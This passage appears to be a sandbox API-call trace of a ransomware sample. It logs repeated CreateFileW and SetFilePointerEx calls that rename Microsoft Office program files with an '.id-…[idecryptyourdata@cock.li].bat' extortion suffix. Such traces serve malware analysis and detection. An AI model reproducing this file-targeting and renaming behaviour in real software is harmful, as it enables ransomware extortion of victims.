mt.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.362] CloseHandle (hObject=0x52c) returned 1 [0175.363] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.363] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Office 2007 - 2010.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\office 2007 - 2010.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.364] CloseHandle (hObject=0x52c) returned 1 [0175.364] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.364] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Times New Roman-Arial.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\times new roman-arial.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.365] CloseHandle (hObject=0x52c) returned 1 [0175.365] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.365] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\TrebuchetMs.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\trebuchetms.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.366] CloseHandle (hObject=0x52c) returned 1 [0175.366] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.366] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT-Rockwell.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt-rockwell.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.367] CloseHandle (hObject=0x52c) returned 1 [0175.367] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.367] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Tw Cen MT.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\tw cen mt.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.368] CloseHandle (hObject=0x52c) returned 1 [0175.368] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.368] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Wisp.thmx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\wisp.thmx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.369] CloseHandle (hObject=0x52c) returned 1 [0175.371] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.371] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\CommonSequencingProperties.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\commonsequencingproperties.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.372] CloseHandle (hObject=0x52c) returned 1 [0175.372] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.372] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Flattener.exe.config.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\flattener.exe.config.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.373] CloseHandle (hObject=0x52c) returned 1 [0175.377] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.377] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10.mp4.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10.mp4.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.377] CloseHandle (hObject=0x52c) returned 1 [0175.378] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.378] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win10_RTL.mp4.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win10_rtl.mp4.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.378] CloseHandle (hObject=0x52c) returned 1 [0175.379] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.379] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7.wmv.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7.wmv.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.379] CloseHandle (hObject=0x52c) returned 1 [0175.380] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.380] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win7_RTL.wmv.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win7_rtl.wmv.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.380] CloseHandle (hObject=0x52c) returned 1 [0175.381] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.381] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8.mp4.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8.mp4.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.381] CloseHandle (hObject=0x52c) returned 1 [0175.382] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.383] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\fre\\StartMenu_Win8_RTL.mp4.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\fre\\startmenu_win8_rtl.mp4.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.383] CloseHandle (hObject=0x52c) returned 1 [0175.386] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.386] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.access.access.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.386] CloseHandle (hObject=0x52c) returned 1 [0175.387] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.388] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.388] CloseHandle (hObject=0x52c) returned 1 [0175.389] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.389] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.accessmuiset.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.accessmuiset.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.389] CloseHandle (hObject=0x52c) returned 1 [0175.390] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.390] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.390] CloseHandle (hObject=0x52c) returned 1 [0175.391] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.391] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.dcfmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcfmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.391] CloseHandle (hObject=0x52c) returned 1 [0175.830] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.830] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.830] CloseHandle (hObject=0x544) returned 1 [0175.831] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.831] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.832] CloseHandle (hObject=0x544) returned 1 [0175.833] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.833] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.lyncmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lyncmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.833] CloseHandle (hObject=0x544) returned 1 [0175.834] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.834] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32mui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32mui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.834] CloseHandle (hObject=0x544) returned 1 [0175.835] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.835] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.office32ww.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.office32ww.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.835] CloseHandle (hObject=0x544) returned 1 [0175.836] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.836] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.836] CloseHandle (hObject=0x544) returned 1 [0175.837] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.837] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemuiset.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemuiset.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.837] CloseHandle (hObject=0x544) returned 1 [0175.838] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.838] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.839] CloseHandle (hObject=0x544) returned 1 [0175.839] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.839] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.onenotemui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenotemui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.839] CloseHandle (hObject=0x544) returned 1 [0175.840] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.840] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.840] CloseHandle (hObject=0x544) returned 1 [0175.841] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.841] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.osmmui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmmui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.841] CloseHandle (hObject=0x544) returned 1 [0175.842] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.842] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.842] CloseHandle (hObject=0x544) returned 1 [0175.843] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, 